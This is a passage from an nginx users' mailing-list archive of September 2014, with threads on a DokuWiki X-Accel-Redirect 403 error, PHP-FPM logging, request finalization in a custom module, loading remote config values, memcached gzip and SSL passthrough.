"[...] 25108#0: *200 access forbidden by rule, > client: XX.XX.XX.XX, server: wiki.example.com, request: "GET > /lib/exe/js.php?tseed=1395165407 HTTP/1.1 [...]". > > I've got no clue how to debug this, to be honest. I didn't made any > change, just upgrading one of the involved browsers. > Could this be an incompatibility with this new Iceweasel version? > Any ideas for this? That's very strange. Could you provide a debug log? http://nginx.org/en/docs/debugging_log.html > > And one more question: I've tried (because of these failures) to enable > spdy just on some vhosts, but it seems, enabling spdy in one of these > makes all vhosts using it. Is this correct? Could I circumvent this > using two ips, one spdy enabled, and one spdy disabled? > Yes, this is correct and documented: http://nginx.org/r/listen Note, that it "allows accepting SPDY connections on this port". And yes, two ips will help. wbr, Valentin V. Bartenev From viktor at szepe.net Wed Sep 3 20:23:33 2014 From: viktor at szepe.net (=?utf-8?b?U3rDqXBl?= Viktor) Date: Wed, 03 Sep 2014 22:23:33 +0200 Subject: NGINX + PHP-FPM error logs miss IP Message-ID: <20140903222333.Horde.hmTvcgUiq69hewWFlv_O8w1@szepe.net> Could it be that Apache 2.2 + mod_fastcgi + PHP FPM logs IP addresses to errror.log but NGINX + PHP-FPM does not? I mean not to a log file specified in error_log configuration option. [03-Sep-2014 19:37:24 UTC] {message from e.g. error_log()} *no IP address in the the line After commenting out `error_log` config option, stdout got back to nginx 2014/09/03 22:14:15 [error] 8831#0: *1 FastCGI sent in stderr: "PHP message: File does not exist: errorlog_url_hack (s:59:"//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js";) PHP message: File does not exist: nofollow_robot_trap PHP message: File does not exist: nofollow_robot_trap PHP message: File does not exist: nofollow_robot_trap PHP message: File does not exist: nofollow_robot_trap PHP message: File does not exist: nofollow_robot_trap PHP message: File does not exist: nofollow_robot_trap" while reading response header from upstream, client: 192.168.12.135, server: subdir.wp, request: "GET //ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "subdir.wp" Here is no separate message for every line, so more `error_log()` function's output goes into on nginx error message. But there is a bit about the IP: `client: 192.168.12.135` Could you help me log IP addresses and log PHP's error messages as separate messages? Sz?pe Viktor -- +36-20-4242498 sms at szepe.net skype: szepe.viktor Budapest, XX. ker?let From georg at riseup.net Wed Sep 3 21:50:07 2014 From: georg at riseup.net (georg) Date: Wed, 03 Sep 2014 23:50:07 +0200 Subject: Questions regarding spdy module, browser behaviour and "access forbidden by rule" In-Reply-To: <2869527.IvnDEkO7Be@vbart-laptop> References: <54075B8A.2070304@riseup.net> <2869527.IvnDEkO7Be@vbart-laptop> Message-ID: <54078D0F.908@riseup.net> Hi Valentin, Thanks for your help. On 09/03/2014 10:23 PM, Valentin V. Bartenev wrote: > On Wednesday 03 September 2014 20:18:50 georg wrote: > [..] >> However, using Iceweasel 31.0-1~bpo70+1 (out of wheezy-backports), the >> browser console reads various 403 forbidden, and the nginx log is >> telling me the cause: "[...] 25108#0: *200 access forbidden by rule, >> client: XX.XX.XX.XX, server: wiki.example.com, request: "GET >> /lib/exe/js.php?tseed=1395165407 HTTP/1.1 [...]". >> >> I've got no clue how to debug this, to be honest. I didn't made any >> change, just upgrading one of the involved browsers. >> Could this be an incompatibility with this new Iceweasel version? >> Any ideas for this? > > That's very strange. Could you provide a debug log? > http://nginx.org/en/docs/debugging_log.html Sure. I've posted it at [1], the log contains one access, just made with spdy enabled, and Iceweasel out of wheezy-backports. Greetings, Georg [1] http://pastebin.com/raw.php?i=ei9wHeAy -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 259 bytes Desc: OpenPGP digital signature URL: From vbart at nginx.com Wed Sep 3 22:04:09 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Thu, 04 Sep 2014 02:04:09 +0400 Subject: Questions regarding spdy module, browser behaviour and "access forbidden by rule" In-Reply-To: <54078D0F.908@riseup.net> References: <54075B8A.2070304@riseup.net> <2869527.IvnDEkO7Be@vbart-laptop> <54078D0F.908@riseup.net> Message-ID: <3537417.Jba1i41uO8@vbart-laptop> On Wednesday 03 September 2014 23:50:07 georg wrote: > Hi Valentin, > > Thanks for your help. > > On 09/03/2014 10:23 PM, Valentin V. Bartenev wrote: > > On Wednesday 03 September 2014 20:18:50 georg wrote: > > [..] > >> However, using Iceweasel 31.0-1~bpo70+1 (out of wheezy-backports), the > >> browser console reads various 403 forbidden, and the nginx log is > >> telling me the cause: "[...] 25108#0: *200 access forbidden by rule, > >> client: XX.XX.XX.XX, server: wiki.example.com, request: "GET > >> /lib/exe/js.php?tseed=1395165407 HTTP/1.1 [...]". > >> > >> I've got no clue how to debug this, to be honest. I didn't made any > >> change, just upgrading one of the involved browsers. > >> Could this be an incompatibility with this new Iceweasel version? > >> Any ideas for this? > > > > That's very strange. Could you provide a debug log? > > http://nginx.org/en/docs/debugging_log.html > > Sure. I've posted it at [1], the log contains one access, just made with > spdy enabled, and Iceweasel out of wheezy-backports. > [..] It's not clear how it's related to SPDY and Iceweasel, but it looks like misconfiguration on your side. In the debug log I see that docuwiki returns X-Accel-Redirect to "/var/lib/dokuwiki/data/cache/.." which is matched by location ~/(data|conf|bin|inc)/ with a deny rule. wbr, Valentin V. Bartenev From vbart at nginx.com Wed Sep 3 22:39:26 2014 From: vbart at nginx.com (Valentin V. Bartenev) Date: Thu, 04 Sep 2014 02:39:26 +0400 Subject: Questions regarding spdy module, browser behaviour and "access forbidden by rule" In-Reply-To: <3537417.Jba1i41uO8@vbart-laptop> References: <54075B8A.2070304@riseup.net> <54078D0F.908@riseup.net> <3537417.Jba1i41uO8@vbart-laptop> Message-ID: <4102339.3vC8gBLauh@vbart-laptop> On Thursday 04 September 2014 02:04:09 Valentin V. Bartenev wrote: > On Wednesday 03 September 2014 23:50:07 georg wrote: > > Hi Valentin, > > > > Thanks for your help. > > > > On 09/03/2014 10:23 PM, Valentin V. Bartenev wrote: > > > On Wednesday 03 September 2014 20:18:50 georg wrote: > > > [..] > > >> However, using Iceweasel 31.0-1~bpo70+1 (out of wheezy-backports), the > > >> browser console reads various 403 forbidden, and the nginx log is > > >> telling me the cause: "[...] 25108#0: *200 access forbidden by rule, > > >> client: XX.XX.XX.XX, server: wiki.example.com, request: "GET > > >> /lib/exe/js.php?tseed=1395165407 HTTP/1.1 [...]". > > >> > > >> I've got no clue how to debug this, to be honest. I didn't made any > > >> change, just upgrading one of the involved browsers. > > >> Could this be an incompatibility with this new Iceweasel version? > > >> Any ideas for this? > > > > > > That's very strange. Could you provide a debug log? > > > http://nginx.org/en/docs/debugging_log.html > > > > Sure. I've posted it at [1], the log contains one access, just made with > > spdy enabled, and Iceweasel out of wheezy-backports. > > > [..] > > It's not clear how it's related to SPDY and Iceweasel, but it looks > like misconfiguration on your side. > > In the debug log I see that docuwiki returns X-Accel-Redirect to > "/var/lib/dokuwiki/data/cache/.." which is matched by location > ~/(data|conf|bin|inc)/ with a deny rule. > Well, I can guess that you have made some change that broke these resources, and haven't been noticed due to browser's cache. But update of the browser could result in reset of the cache. wbr, Valentin V. Bartenev From mdounin at mdounin.ru Thu Sep 4 01:10:02 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 4 Sep 2014 05:10:02 +0400 Subject: terminate a connection after sending headers In-Reply-To: References: <20140902130903.GI1849@mdounin.ru> Message-ID: <20140904011002.GX1849@mdounin.ru> Hello! On Wed, Sep 03, 2014 at 10:10:01AM -0400, erankor2 wrote: > Maxim, thank you very much for your response. > > To clarify - the problem is not about freeing the request (I don't think > there's a resource leak here), the problem is that the connection is just > left hanging until the client closes it / the server is restarted. > It is true that write_event_handler gets initialized to zero when the > request is allocated, but it is set to ngx_http_request_empty_handler before > the first line of my code even runs. In ngx_http_core_content_phase > there's: > > if (r->content_handler) { > r->write_event_handler = ngx_http_request_empty_handler; > ngx_http_finalize_request(r, r->content_handler(r)); > return NGX_OK; > } > > where r->content_handler is the entry point to my code. So, unless I > explicitly reset it back to NULL (something that I never saw in any other > nginx module) write_event_handler will not be null and the connection will > be left hanging. > > I forked some sample hello world module and modified it to reproduce the > problem, please check it out here: > https://github.com/erankor/nginx-hello-world-module/blob/master/ngx_http_hello_world_module.c > > In that code, I'm sending the response headers and then trigger a timer for > 1 second. In the timer callback I close the request with NGX_ERROR, but the > connection remains active (I used a timer here since that's the easiest > solution to defer the execution, in my real project I'm performing > asynchronous file I/O) The problem is that you use your own timer, and don't run posted requests after it - but the request termination code relies on posted requests being run. If you are using your own events, you should do processing similar to ngx_http_request_handler(), see src/http/ngx_http_request.c. Notably, you have to call the ngx_http_run_posted_requests() function after the code which calls ngx_http_finalize_request(). In this particular case, trivial fix is to do something like: static void event_callback(ngx_event_t *ev) { + ngx_connection_t *c; ngx_http_request_t *r = (ngx_http_request_t *)ev->data; + c = r->connection; + ngx_http_finalize_request(r, NGX_ERROR); + + ngx_http_run_posted_requests(c); } -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Thu Sep 4 05:07:26 2014 From: nginx-forum at nginx.us (igorclark) Date: Thu, 04 Sep 2014 01:07:26 -0400 Subject: Fetching HTTP value into config at start-up Message-ID: Hi all, I want to read some remote values via HTTP into nginx config variables, just once at nginx startup / reload time, and pass them as fastcgi_params into PHP scripts. I control the remote system, so I'll know if it needs to re-read and can send a HUP to nginx. I don't need it to happen every request though, because the value won't change for long periods - but it will change sometimes, and I don't want to have push more config out to multiple nginx servers if I can avoid it. Is there a way to do this that doesn't create problems? Here's what I've tried so far. This first one doesn't work, because the "API [is] disabled in the context of set_by_lua*": set_by_lua $config_variable " local result = ngx.location.capture('http://url.to.fetch/') return result " (Same with ngx.socket.*) This next one works; it feels horrible to do this but if it was just once at start-up, it might be OK - but this executes for every incoming request (confirmed by using /bin/date as the 'command' and just hitting refresh): set_by_lua $config_variable " local command = "/usr/bin/curl http://url.to.fetch/" local handle = io.popen(command) local result = handle:read("*a") handle:close() return result " Same for this one, it executes for every request: perl_set $config_variable ' sub { $var = `/bin/date`; return $var; } ' Is there a good way to do this, that only executes once, and doesn't have horrible shell interactions? Thanks very much for your help, Igor Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253063,253063#msg-253063 From oscaretu at gmail.com Thu Sep 4 06:37:10 2014 From: oscaretu at gmail.com (oscaretu .) Date: Thu, 4 Sep 2014 08:37:10 +0200 Subject: Fetching HTTP value into config at start-up In-Reply-To: References: Message-ID: Hello, igorclark Perhahs you can create a shell to launch nginx, and before that, ejecute a shell to assign a environment variable as a result of the execution of a program, or create (update) a file that is to be included from nginx config file when starting Some ideas: http://nginx.2469901.n2.nabble.com/Want-to-access-UNIX-environment-variable-td7584005.html https://www.google.com/search?client=ubuntu&channel=fs&q=get+environment+variable+from+nginx&ie=utf-8&oe=utf-8 Greetings, Oscar On Thu, Sep 4, 2014 at 7:07 AM, igorclark wrote: > Hi all, > > I want to read some remote values via HTTP into nginx config variables, > just > once at nginx startup / reload time, and pass them as fastcgi_params into > PHP scripts. I control the remote system, so I'll know if it needs to > re-read and can send a HUP to nginx. I don't need it to happen every > request > though, because the value won't change for long periods - but it will > change > sometimes, and I don't want to have push more config out to multiple nginx > servers if I can avoid it. > > Is there a way to do this that doesn't create problems? > > Here's what I've tried so far. > > This first one doesn't work, because the "API [is] disabled in the context > of set_by_lua*": > > set_by_lua $config_variable " > local result = ngx.location.capture('http://url.to.fetch/') > return result > " > > (Same with ngx.socket.*) > > This next one works; it feels horrible to do this but if it was just once > at > start-up, it might be OK - but this executes for every incoming request > (confirmed by using /bin/date as the 'command' and just hitting refresh): > > set_by_lua $config_variable " > local command = "/usr/bin/curl http://url.to.fetch/" > local handle = io.popen(command) > local result = handle:read("*a") > handle:close() > return result > " > > Same for this one, it executes for every request: > > perl_set $config_variable ' > sub { > $var = `/bin/date`; > return $var; > } > ' > > Is there a good way to do this, that only executes once, and doesn't have > horrible shell interactions? > > Thanks very much for your help, > Igor > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,253063,253063#msg-253063 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Oscar Fernandez Sierra oscaretu at gmail.com -------------- next part -------------- An HTML attachment was scrubbed... URL: From cyrus_the_great at riseup.net Thu Sep 4 09:08:34 2014 From: cyrus_the_great at riseup.net (Cyrus) Date: Thu, 04 Sep 2014 19:08:34 +1000 Subject: bitwasp htaccess Message-ID: <54082C12.2070400@riseup.net> I've got a nice easy htaccess I need to convert to nginx. RewriteEngine On RewriteBase /bitwasp RewriteCond %{REQUEST_URI} ^system.* RewriteRule ^(.*)$ /index.php/$1 [L] # Checks to see if the user is attempting to access a valid file, #such as an image or css document, if this isn't true it sends the #request to index.php RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ index.php/$1 [L] # If we don't have mod_rewrite installed, all 404's # can be sent to index.php, and everything works as normal. # Submitted by: ElliotHaughin ErrorDocument 404 /index.php From nginx-forum at nginx.us Thu Sep 4 11:06:59 2014 From: nginx-forum at nginx.us (dedero) Date: Thu, 04 Sep 2014 07:06:59 -0400 Subject: Nginx as reverse proxy with apache Message-ID: Hello!, I would like to ask you about a concern that I have and I could not find anything in the forums or google. The situation is: I already have configured an apache server with 2-step authentication and reverse proxy, which is used to as an additional security layer to enter a Remote Desktop Services infrastructure. I'm using a Remote desktop web gateway application (from remotelabs) which is a web gateway working with websockets and it connects to the remote desktop infrastructure. In a summery: Internet --> apache with 2 factor authentication and pwauth and reverse proxy --> remote desktop gateway --> remote desktop infrastructure. The problem is for some reason everything works inside the infrastructure but when I tried to connect from outside (internet) it doesn't work in the web gateway, it just cannot connect..... So the folowing steps is put in the middle Nginx as a reverse proxy because the developer of web gateway recommended that due to Nginx works better with websockets rather than apache. I was reading that is possible to run apache and nginx in the same port but changing the listening ip addresses, but is possible to use Nginx as reverse proxy with apache with ngx_http_auth_request_module ? If so, is there any orientative example to do this?. Thanks a lot! Best regards, Bruno. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253070,253070#msg-253070 From nginx-forum at nginx.us Thu Sep 4 14:31:55 2014 From: nginx-forum at nginx.us (igorclark) Date: Thu, 04 Sep 2014 10:31:55 -0400 Subject: Fetching HTTP value into config at start-up In-Reply-To: References: Message-ID: <599653e24143fd948d27eaaa62b4e889.NginxMailingListEnglish@forum.nginx.org> Thanks Oscar. Yes I'd read that first page and a bunch of those search results before. I guess I'll end up writing custom config files per environment, too, and maybe a script to regenerate and send a HUP to nginx when the data changes. I really wanted to avoid this because it's just one more moving part that I'd rather not have. It seems pretty reasonable to want to do this sort of thing just once at startup. Even getting an env variable for every HTTP request seems kind of an overhead, however tiny. Maybe I'll look at writing a module to do it some day. When I have enough time to learn how to write network-accessing ngx_* modules without breaking everything ;-) Anyway, if anyone knows of another way to do it, that'd be great, but in the meantime I appreciate your response. Thanks. Best, Igor Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253063,253073#msg-253073 From nginx-forum at nginx.us Thu Sep 4 14:39:03 2014 From: nginx-forum at nginx.us (LinU777) Date: Thu, 04 Sep 2014 10:39:03 -0400 Subject: nginx + memcached + gzip Message-ID: Hello. I have service with memcached for storing large xml data. Data is compressed in memcached. I want to send responce gzipped if client supports that and decompressed if not. But with my config responce goes to client always decompressed. There is my site config: server { listen 80; server_name static.app1.feeds.lan; location / { memcached_pass 10.10.0.11:11211; gunzip on; memcached_gzip_flag 2; gzip_static on; gzip on; gzip_proxied any; gzip_types "text/xml"; gzip_vary on; set $memcached_key "null"; if ($uri ~* "/uploads/(.*)/feed.xml") { set $memcached_key $1; } } } and nginx config: user www-data; worker_processes 4; pid /run/nginx.pid; events { worker_connections 16384; # multi_accept on; } http { ## # Basic Settings ## sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 65; types_hash_max_size 2048; # server_tokens off; # server_names_hash_bucket_size 64; # server_name_in_redirect off; include /etc/nginx/mime.types; default_type application/octet-stream; ## # Logging Settings ## access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; ## # Gzip Settings ## gzip on; gzip_disable "msie6"; gzip_vary on; gzip_proxied any; gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript; ... Thanks! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253074,253074#msg-253074 From nginx-forum at nginx.us Thu Sep 4 14:42:30 2014 From: nginx-forum at nginx.us (LinU777) Date: Thu, 04 Sep 2014 10:42:30 -0400 Subject: nginx + memcached + gzip In-Reply-To: References: Message-ID: I have checked with curl: curl -I http://static.app1.feeds.lan/uploads/one_feed/1/feed.xml --compressed HTTP/1.1 200 OK Server: nginx/1.6.1 Date: Thu, 04 Sep 2014 14:39:54 GMT Content-Type: text/xml Connection: keep-alive Vary: Accept-Encoding curl -I http://static.app1.feeds.lan/uploads/one_feed/1/feed.xml HTTP/1.1 200 OK Server: nginx/1.6.1 Date: Thu, 04 Sep 2014 14:39:59 GMT Content-Type: text/xml Connection: keep-alive Vary: Accept-Encoding Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253074,253075#msg-253075 From georg at riseup.net Thu Sep 4 15:41:26 2014 From: georg at riseup.net (georg) Date: Thu, 04 Sep 2014 17:41:26 +0200 Subject: Questions regarding spdy module, browser behaviour and "access forbidden by rule" In-Reply-To: <4102339.3vC8gBLauh@vbart-laptop> References: <54075B8A.2070304@riseup.net> <54078D0F.908@riseup.net> <3537417.Jba1i41uO8@vbart-laptop> <4102339.3vC8gBLauh@vbart-laptop> Message-ID: <54088826.5060307@riseup.net> On 09/04/2014 12:39 AM, Valentin V. Bartenev wrote: > On Thursday 04 September 2014 02:04:09 Valentin V. Bartenev wrote: >> On Wednesday 03 September 2014 23:50:07 georg wrote: >>> On 09/03/2014 10:23 PM, Valentin V. Bartenev wrote: >>>> On Wednesday 03 September 2014 20:18:50 georg wrote: >>>> [..] >>>>> However, using Iceweasel 31.0-1~bpo70+1 (out of wheezy-backports), the >>>>> browser console reads various 403 forbidden, and the nginx log is >>>>> telling me the cause: "[...] 25108#0: *200 access forbidden by rule, >>>>> client: XX.XX.XX.XX, server: wiki.example.com, request: "GET >>>>> /lib/exe/js.php?tseed=1395165407 HTTP/1.1 [...]". >>>>> >>>>> I've got no clue how to debug this, to be honest. I didn't made any >>>>> change, just upgrading one of the involved browsers. >>>>> Could this be an incompatibility with this new Iceweasel version? >>>>> Any ideas for this? >>>> >>>> That's very strange. Could you provide a debug log? >>>> http://nginx.org/en/docs/debugging_log.html >>> >>> Sure. I've posted it at [1], the log contains one access, just made with >>> spdy enabled, and Iceweasel out of wheezy-backports. >>> >> [..] >> >> It's not clear how it's related to SPDY and Iceweasel, but it looks >> like misconfiguration on your side. >> >> In the debug log I see that docuwiki returns X-Accel-Redirect to >> "/var/lib/dokuwiki/data/cache/.." which is matched by location >> ~/(data|conf|bin|inc)/ with a deny rule. > > Well, I can guess that you have made some change that broke these resources, > and haven't been noticed due to browser's cache. > > But update of the browser could result in reset of the cache. I thought of something similar, and to be sure I've used the build-in "Restart with addons disabled"-function of Iceweasel. At starting up it will then offer two choices: Either start with addons disabled (so called "Safe Mode") or reset Iceweasel, which will clear all caches, settings, etc. Using the second option in Iceweasel out of wheezy (after I've downgraded Iceweasel out of backports to Iceweasel of of stable) didn't made a difference, all was fine, no errors reported. -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 259 bytes Desc: OpenPGP digital signature URL: From georg at riseup.net Thu Sep 4 15:56:26 2014 From: georg at riseup.net (georg) Date: Thu, 04 Sep 2014 17:56:26 +0200 Subject: Questions regarding spdy module, browser behaviour and "access forbidden by rule" In-Reply-To: <3537417.Jba1i41uO8@vbart-laptop> References: <54075B8A.2070304@riseup.net> <2869527.IvnDEkO7Be@vbart-laptop> <54078D0F.908@riseup.net> <3537417.Jba1i41uO8@vbart-laptop> Message-ID: <54088BAA.6090308@riseup.net> On 09/04/2014 12:04 AM, Valentin V. Bartenev wrote: > On Wednesday 03 September 2014 23:50:07 georg wrote: >> On 09/03/2014 10:23 PM, Valentin V. Bartenev wrote: >>> On Wednesday 03 September 2014 20:18:50 georg wrote: >>> [..] >>>> However, using Iceweasel 31.0-1~bpo70+1 (out of wheezy-backports), the >>>> browser console reads various 403 forbidden, and the nginx log is >>>> telling me the cause: "[...] 25108#0: *200 access forbidden by rule, >>>> client: XX.XX.XX.XX, server: wiki.example.com, request: "GET >>>> /lib/exe/js.php?tseed=1395165407 HTTP/1.1 [...]". >>>> >>>> I've got no clue how to debug this, to be honest. I didn't made any >>>> change, just upgrading one of the involved browsers. >>>> Could this be an incompatibility with this new Iceweasel version? >>>> Any ideas for this? >>> >>> That's very strange. Could you provide a debug log? >>> http://nginx.org/en/docs/debugging_log.html >> >> Sure. I've posted it at [1], the log contains one access, just made with >> spdy enabled, and Iceweasel out of wheezy-backports. >> > [..] > > It's not clear how it's related to SPDY and Iceweasel, but it looks > like misconfiguration on your side. Still I don't understand why enabling spdy makes this difference, and how this influences stuff like this, but... > In the debug log I see that docuwiki returns X-Accel-Redirect to > "/var/lib/dokuwiki/data/cache/.." which is matched by location > ~/(data|conf|bin|inc)/ with a deny rule. ...you put me on the right track, Valentin! - These locations are denied because these contain for example content, like cached pages, one could access without authorization. The wiki is closed, reading and editing is only possible after successfull authentification, so that's why. - Dokuwiki supports a header "X-Accel-Redirect", which, when using, should increase file transfers etc., because then handled directly by the webserver. Up until today I've used this setting. After disabling, everything works like a charm, with all browsers (and different versions) I've tested (Chromium, Iceweasel, MSIE, Opera, Safari). - Still I don't understand why using this feature (in combination with spdy) works in Iceweasel 24, and giving these failures in Iceweasel 31. Anyway, some more people seem to have problems with this (see [1] for example), at [2] and [3] you'll find a bug report and a follow up, created in November 2011, fixed and closed in March 2014. I'm quite sure these changes haven't reached Debian Wheezy, leading to this problem. Thank you Valentin for your help - I'm fine. Cheers, Georg [1] http://forum.nginx.org/read.php?2,219485,219485#msg-219485 [2] https://bugs.dokuwiki.org/index.php?do=details&task_id=2388 [3] https://github.com/splitbrain/dokuwiki/pull/543 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 259 bytes Desc: OpenPGP digital signature URL: From nginx-forum at nginx.us Thu Sep 4 18:12:03 2014 From: nginx-forum at nginx.us (divya84) Date: Thu, 04 Sep 2014 14:12:03 -0400 Subject: Mapping requests and responses Message-ID: I am currently using nginx as a reverse proxy. I want to be able to map a requests to its corresponding response. For example, I want to log some parts of a user request (say form field values in a POST request) along with the set-cookie that was set in the corresponding response header. Would this be easy to create an add-on that performs this functionality. If yes, could you point me to any relevant modules that might help? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253080,253080#msg-253080 From nginx-forum at nginx.us Thu Sep 4 20:38:41 2014 From: nginx-forum at nginx.us (erankor2) Date: Thu, 04 Sep 2014 16:38:41 -0400 Subject: terminate a connection after sending headers In-Reply-To: <20140904011002.GX1849@mdounin.ru> References: <20140904011002.GX1849@mdounin.ru> Message-ID: <526de0a4342b2fea16d15520bd9c5095.NginxMailingListEnglish@forum.nginx.org> Thank you very much Maxim ! this works ! However, I bumped into a new problem, I use 2 different types of asyncronous operations in my code - file I/O and http requests. When I call ngx_http_run_posted_requests from the aio callback it works well, but when I call it from the HTTP completion callback it actually makes the request hang. I can see that it calls ngx_http_upstream_check_broken_connection in r->write_event_handler(r). I guess that in this case I should let ngx_http_run_posted_requests run from the upstream module instead of calling it myself. So my questions are: 1. Is there a simple rule that dictates when I should call ngx_http_run_posted_requests and when I should not ? I can work around the problem by doing something like 'if called from the aio callback call ngx_http_run_posted_requests' otherwise, don't call, but that doesn't feel like the correct solution. 2. A simpler solution that seems to work for me, is to call ngx_http_run_posted_requests only when I see that r->main->count is one (before finalize). But I don't know if that solution makes any sense - is there any relation between these posted_requests and the request count ? My understanding (before reading your reply :)) was that whenever I do something asynchronous I must increment the count, whenever I call finalize_request the count is decremented and once the count reaches zero the request is terminated. So, what I'm missing is why the termination of the request has to be deferred via posted requests - couldn't ngx_http_terminate_request just close the request only when it sees the count reached zero instead ? Thanks again for all your help, I really appreciate it ! Eran Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253006,253081#msg-253081 From nginx-forum at nginx.us Fri Sep 5 00:49:09 2014 From: nginx-forum at nginx.us (useopenid) Date: Thu, 04 Sep 2014 20:49:09 -0400 Subject: nginx mail proxy - dovecot ssl backend In-Reply-To: References: <4ECFFD1E.2030002@yahoo.com.br> <9488c17d7cf4ee5a292ad097b1740294.NginxMailingListEnglish@forum.nginx.org> <42c203a0a7a1711d61fff1e4118ab921.NginxMailingListEnglish@forum.nginx.org> <4784f9fe36b38297a526f1ba7537a4a7.NginxMailingListEnglish@forum.nginx.org> Message-ID: <01877f9ad2f754ce06c078535332654b.NginxMailingListEnglish@forum.nginx.org> I'm getting errors when I try to get the diff, is it still available? Thanks... Posted at Nginx Forum: http://forum.nginx.org/read.php?2,219069,253082#msg-253082 From nginx-forum at nginx.us Fri Sep 5 03:53:43 2014 From: nginx-forum at nginx.us (dukzcry) Date: Thu, 04 Sep 2014 23:53:43 -0400 Subject: nginx mail proxy - dovecot ssl backend In-Reply-To: <01877f9ad2f754ce06c078535332654b.NginxMailingListEnglish@forum.nginx.org> References: <4ECFFD1E.2030002@yahoo.com.br> <9488c17d7cf4ee5a292ad097b1740294.NginxMailingListEnglish@forum.nginx.org> <42c203a0a7a1711d61fff1e4118ab921.NginxMailingListEnglish@forum.nginx.org> <4784f9fe36b38297a526f1ba7537a4a7.NginxMailingListEnglish@forum.nginx.org> <01877f9ad2f754ce06c078535332654b.NginxMailingListEnglish@forum.nginx.org> Message-ID: <281e9d10b14cad10fa7ede612c0d25ac.NginxMailingListEnglish@forum.nginx.org> Yes, but got moved. Here's the diff: https://github.com/dukzcry/nginx/commit/f0af0f19ccc5e173fa4dddd3974cd05ef0b52692.diff and here's the patched tree: https://github.com/dukzcry/nginx Posted at Nginx Forum: http://forum.nginx.org/read.php?2,219069,253083#msg-253083 From mdounin at mdounin.ru Fri Sep 5 04:35:16 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Fri, 5 Sep 2014 08:35:16 +0400 Subject: terminate a connection after sending headers In-Reply-To: <526de0a4342b2fea16d15520bd9c5095.NginxMailingListEnglish@forum.nginx.org> References: <20140904011002.GX1849@mdounin.ru> <526de0a4342b2fea16d15520bd9c5095.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140905043515.GA1634@mdounin.ru> Hello! On Thu, Sep 04, 2014 at 04:38:41PM -0400, erankor2 wrote: > Thank you very much Maxim ! this works ! > > However, I bumped into a new problem, I use 2 different types of asyncronous > operations in my code - file I/O and http requests. When I call > ngx_http_run_posted_requests from the aio callback it works well, but when I > call it from the HTTP completion callback it actually makes the request > hang. > I can see that it calls ngx_http_upstream_check_broken_connection in > r->write_event_handler(r). I guess that in this case I should let > ngx_http_run_posted_requests run from the upstream module instead of calling > it myself. > > So my questions are: > 1. Is there a simple rule that dictates when I should call > ngx_http_run_posted_requests and when I should not ? > I can work around the problem by doing something like 'if called from the > aio callback call ngx_http_run_posted_requests' otherwise, don't call, but > that doesn't feel like the correct solution. You should call ngx_http_run_posted_requests() after low-level events. That is, there is no need to call it after http-related events, as ngx_http_run_posted_requests() will be called by ngx_http_request_handler(). But if your own low-level events are triggered, like the timer in your code, it's your responsibility to call ngx_http_request_handler() after them. > 2. A simpler solution that seems to work for me, is to call > ngx_http_run_posted_requests only when I see that r->main->count is one > (before finalize). But I don't know if that solution makes any sense - is > there any relation between these posted_requests and the request count ? No, it doesn't make sense to check r->main->count. > My understanding (before reading your reply :)) was that whenever I do > something asynchronous I must increment the count, whenever I call > finalize_request the count is decremented and once the count reaches zero > the request is terminated. So, what I'm missing is why the termination of > the request has to be deferred via posted requests - couldn't > ngx_http_terminate_request just close the request only when it sees the > count reached zero instead ? Termination on errors which you are doing isn't expected to wait for r->main->count to reach zero. It is expected to proactively stop all ongoing activity by executing cleanup handlers, and then free the request. -- Maxim Dounin http://nginx.org/ From nginx-forum at nginx.us Fri Sep 5 08:04:28 2014 From: nginx-forum at nginx.us (OzJD) Date: Fri, 05 Sep 2014 04:04:28 -0400 Subject: NGINX SSL passthrough without certificate Message-ID: <8ad21daad6465294f06b195b151abffd.NginxMailingListEnglish@forum.nginx.org> We currently have a backend server that listens for SSL requests, and (using SNI) chooses to pass them on to the correct place, or alternatively will serve the requested HTTPS. Our current configuration is slow (not painfully, just slower than we'd like), and we figured having NGINX do some of the work would speed things up. Can NGINX pass through some HTTPS requests (by domain) without modifying anything (by checking SNI in the initial packet)? Most (all?) websites indicate that I should decode and encode the traffic (which is not be possible because of cases such as https://google.com/). So ultimately, what would be ideal for us is: 1. NGINX sits on network boundary, listening for SSL/TLS connections 2. When a new connection comes in, NGINX decides to pass on the TLS connection without touching it OR serve it as a regular HTTPS website (OR depends on domain) Lastly, is there any current way to achieve X-FORWARDED-FOR with HTTPS? I understand it can't go into the actual HTTPS request, but figured it could be sent BEFORE the HTTPS decode packet. (the receiving end would have to understand this also) Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253088,253088#msg-253088 From luky-37 at hotmail.com Fri Sep 5 08:15:48 2014 From: luky-37 at hotmail.com (Lukas Tribus) Date: Fri, 5 Sep 2014 10:15:48 +0200 Subject: NGINX SSL passthrough without certificate In-Reply-To: <8ad21daad6465294f06b195b151abffd.NginxMailingListEnglish@forum.nginx.org> References: <8ad21daad6465294f06b195b151abffd.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hi, > We currently have a backend server that listens for SSL requests, and (using > SNI) chooses to pass them on to the correct place, or alternatively will > serve the requested 